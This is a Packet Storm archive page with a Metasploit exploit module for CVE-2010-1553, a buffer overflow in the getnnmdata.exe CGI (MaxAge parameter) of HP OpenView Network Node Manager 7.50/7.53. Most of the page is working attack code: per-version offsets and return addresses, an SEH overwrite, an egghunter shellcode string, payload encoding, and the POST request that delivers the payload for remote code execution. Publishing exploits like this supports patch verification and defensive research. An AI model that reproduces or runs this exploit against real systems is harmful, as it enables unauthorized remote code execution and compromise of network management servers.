what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow

HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow
Posted Mar 24, 2011
Authored by MC | Site metasploit.com

This Metasploit module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI, an attacker may be able to execute arbitrary code.

tags | exploit, overflow, arbitrary, cgi
advisories | CVE-2010-1553
SHA-256 | 80ff73419a7cd13d7e21eb8ec7e33cd16805fe4f27fb6954c76a5d837fa3bf7f

HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow

Change Mirror Download
##
# $Id: hp_nnm_getnnmdata_maxage.rb 12117 2011-03-23 21:57:16Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ }

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.
By sending specially crafted MaxAge parameter to the getnnmdata.exe CGI,
an attacker may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 12117 $',
'References' =>
[
[ 'CVE', '2010-1553' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => false,
'Payload' =>
{
'Space' => 750,
'BadChars' => "\x00",
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'DisableNops' => 'True',
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
},
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7591, 'Ret' => 0x5a01f277 } ],
[ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2054, 'Ret' => 0x5a666d69 } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 11 2010'))

register_options( [ Opt::RPORT(80) ], self.class )
end

def exploit

egg = rand_text_alpha_upper(4)

hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
hunter << "\xef\xb8" + egg + "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

boom = rand_text_alpha_upper(target['Offset'])
boom << generate_seh_record(target.ret)
boom << hunter + egg + egg
boom << payload.encoded
boom << rand_text_alpha_upper(9024 - payload.encoded.length)

sploit = "SnmpVals=&MaxAge=#{boom}"

print_status("Trying target #{target.name}...")

send_request_cgi({
'uri' => '/OvCgi/getnnmdata.exe',
'method' => 'POST',
'data' => sploit
}, 8)

handler

end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close